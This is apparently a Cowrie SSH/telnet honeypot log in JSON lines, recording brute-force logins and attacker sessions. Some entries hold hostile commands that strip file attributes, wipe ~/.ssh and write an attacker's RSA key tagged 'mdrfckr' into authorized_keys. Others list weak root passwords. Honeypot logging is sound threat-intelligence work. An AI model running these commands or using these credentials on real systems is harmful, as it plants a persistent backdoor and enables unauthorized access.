{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:11:51.117662Z","src_ip":"103.12.154.87","session":"d4bdbea2a730"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:11:52.491874Z","src_ip":"103.12.154.87","session":"d4bdbea2a730"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:11:52.704389Z","src_ip":"103.12.154.87","session":"d4bdbea2a730"}
{"eventid":"cowrie.session.closed","duration":"10.5","message":"Connection lost after 10.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:11:52.705283Z","src_ip":"103.12.154.87","session":"1bdda08eec89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36842,"dst_ip":"1.2.3.4","dst_port":23,"session":"642c92655cc8","protocol":"telnet","message":"New connection: 212.227.235.229:36842 (1.2.3.4:23) [session: 642c92655cc8]","sensor":"my-vps","timestamp":"2025-08-26T07:12:02.110849Z"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":59809,"dst_ip":"1.2.3.4","dst_port":23,"session":"4a11c74806e0","protocol":"telnet","message":"New connection: 123.31.39.100:59809 (1.2.3.4:23) [session: 4a11c74806e0]","sensor":"my-vps","timestamp":"2025-08-26T07:12:03.058261Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33111,"dst_ip":"1.2.3.4","dst_port":23,"session":"2eab8b7586ef","protocol":"telnet","message":"New connection: 212.227.125.160:33111 (1.2.3.4:23) [session: 2eab8b7586ef]","sensor":"my-vps","timestamp":"2025-08-26T07:12:03.125417Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59002,"dst_ip":"1.2.3.4","dst_port":23,"session":"cf5fd842acc2","protocol":"telnet","message":"New connection: 212.227.125.160:59002 (1.2.3.4:23) [session: cf5fd842acc2]","sensor":"my-vps","timestamp":"2025-08-26T07:12:05.083951Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36593,"dst_ip":"1.2.3.4","dst_port":23,"session":"15142e0e6cc2","protocol":"telnet","message":"New connection: 212.227.125.160:36593 (1.2.3.4:23) [session: 15142e0e6cc2]","sensor":"my-vps","timestamp":"2025-08-26T07:12:06.149206Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52313,"dst_ip":"1.2.3.4","dst_port":23,"session":"6380329f535b","protocol":"telnet","message":"New connection: 212.227.235.229:52313 (1.2.3.4:23) [session: 6380329f535b]","sensor":"my-vps","timestamp":"2025-08-26T07:12:06.190912Z"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":59306,"dst_ip":"1.2.3.4","dst_port":23,"session":"1765170b8993","protocol":"telnet","message":"New connection: 123.31.39.100:59306 (1.2.3.4:23) [session: 1765170b8993]","sensor":"my-vps","timestamp":"2025-08-26T07:12:07.127215Z"}
{"eventid":"cowrie.session.closed","duration":46.11205005645752,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:12:48.222830Z","src_ip":"212.227.235.229","session":"642c92655cc8"}
{"eventid":"cowrie.session.closed","duration":46.15042471885681,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:12:49.208594Z","src_ip":"123.31.39.100","session":"4a11c74806e0"}
{"eventid":"cowrie.session.closed","duration":46.11067223548889,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:12:49.236021Z","src_ip":"212.227.125.160","session":"2eab8b7586ef"}
{"eventid":"cowrie.session.closed","duration":46.15267252922058,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:12:51.236533Z","src_ip":"212.227.125.160","session":"cf5fd842acc2"}
{"eventid":"cowrie.session.closed","duration":46.122931241989136,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:12:52.272048Z","src_ip":"212.227.125.160","session":"15142e0e6cc2"}
{"eventid":"cowrie.session.closed","duration":46.089239835739136,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:12:52.280075Z","src_ip":"212.227.235.229","session":"6380329f535b"}
{"eventid":"cowrie.session.closed","duration":46.147414684295654,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:12:53.274552Z","src_ip":"123.31.39.100","session":"1765170b8993"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60844,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f04bbce996c","protocol":"ssh","message":"New connection: 217.72.205.35:60844 (1.2.3.4:22) [session: 4f04bbce996c]","sensor":"my-vps","timestamp":"2025-08-26T07:13:02.186306Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:13:02.187804Z","src_ip":"217.72.205.35","session":"4f04bbce996c"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":40138,"dst_ip":"1.2.3.4","dst_port":22,"session":"12846af5c99a","protocol":"ssh","message":"New connection: 103.12.154.87:40138 (1.2.3.4:22) [session: 12846af5c99a]","sensor":"my-vps","timestamp":"2025-08-26T07:13:05.587323Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:13:05.590012Z","src_ip":"103.12.154.87","session":"12846af5c99a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:13:06.504795Z","src_ip":"103.12.154.87","session":"12846af5c99a"}
{"eventid":"cowrie.login.success","username":"root","password":"201314","message":"login attempt [root/201314] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:13:08.591319Z","src_ip":"103.12.154.87","session":"12846af5c99a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:13:09.069835Z","src_ip":"103.12.154.87","session":"12846af5c99a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:13:09.070536Z","src_ip":"103.12.154.87","session":"12846af5c99a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:13:09.071606Z","src_ip":"103.12.154.87","session":"12846af5c99a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:13:09.283492Z","src_ip":"103.12.154.87","session":"12846af5c99a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:13:09.723882Z","src_ip":"103.12.154.87","session":"12846af5c99a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T07:13:09.724569Z","src_ip":"103.12.154.87","session":"12846af5c99a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T07:13:09.936897Z","src_ip":"103.12.154.87","session":"12846af5c99a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:13:09.937789Z","src_ip":"103.12.154.87","session":"12846af5c99a"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":41824,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb8c9c1ad1d1","protocol":"ssh","message":"New connection: 103.12.154.87:41824 (1.2.3.4:22) [session: bb8c9c1ad1d1]","sensor":"my-vps","timestamp":"2025-08-26T07:13:11.160208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:13:11.162355Z","src_ip":"103.12.154.87","session":"bb8c9c1ad1d1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:13:11.382513Z","src_ip":"103.12.154.87","session":"bb8c9c1ad1d1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T07:13:12.968498Z","src_ip":"103.12.154.87","session":"bb8c9c1ad1d1"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:13:14.194922Z","src_ip":"103.12.154.87","session":"bb8c9c1ad1d1"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":43282,"dst_ip":"1.2.3.4","dst_port":22,"session":"091cff38de0c","protocol":"ssh","message":"New connection: 103.12.154.87:43282 (1.2.3.4:22) [session: 091cff38de0c]","sensor":"my-vps","timestamp":"2025-08-26T07:13:14.399197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:13:14.401392Z","src_ip":"103.12.154.87","session":"091cff38de0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:13:14.611867Z","src_ip":"103.12.154.87","session":"091cff38de0c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:13:16.054894Z","src_ip":"103.12.154.87","session":"091cff38de0c"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:13:16.783644Z","src_ip":"103.12.154.87","session":"091cff38de0c"}
{"eventid":"cowrie.session.closed","duration":"11.2","message":"Connection lost after 11.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:13:16.785433Z","src_ip":"103.12.154.87","session":"12846af5c99a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60342,"dst_ip":"1.2.3.4","dst_port":22,"session":"10248dd6afcc","protocol":"ssh","message":"New connection: 212.227.235.229:60342 (1.2.3.4:22) [session: 10248dd6afcc]","sensor":"my-vps","timestamp":"2025-08-26T07:14:00.557421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T07:14:00.930247Z","src_ip":"212.227.235.229","session":"10248dd6afcc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T07:14:00.931507Z","src_ip":"212.227.235.229","session":"10248dd6afcc"}
{"eventid":"cowrie.login.success","username":"root","password":"Lankesh@123","message":"login attempt [root/Lankesh@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:14:04.488060Z","src_ip":"212.227.235.229","session":"10248dd6afcc"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:14:05.237956Z","src_ip":"212.227.235.229","session":"10248dd6afcc"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":38200,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dab50dfda13","protocol":"ssh","message":"New connection: 103.12.154.87:38200 (1.2.3.4:22) [session: 8dab50dfda13]","sensor":"my-vps","timestamp":"2025-08-26T07:14:26.475127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:14:26.476508Z","src_ip":"103.12.154.87","session":"8dab50dfda13"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:14:26.697035Z","src_ip":"103.12.154.87","session":"8dab50dfda13"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456..","message":"login attempt [root/Aa123456..] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:14:28.979079Z","src_ip":"103.12.154.87","session":"8dab50dfda13"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:14:29.471469Z","src_ip":"103.12.154.87","session":"8dab50dfda13"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:14:29.472263Z","src_ip":"103.12.154.87","session":"8dab50dfda13"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:14:29.473607Z","src_ip":"103.12.154.87","session":"8dab50dfda13"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:14:29.698566Z","src_ip":"103.12.154.87","session":"8dab50dfda13"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:14:30.200731Z","src_ip":"103.12.154.87","session":"8dab50dfda13"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T07:14:30.201432Z","src_ip":"103.12.154.87","session":"8dab50dfda13"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T07:14:30.896345Z","src_ip":"103.12.154.87","session":"8dab50dfda13"}
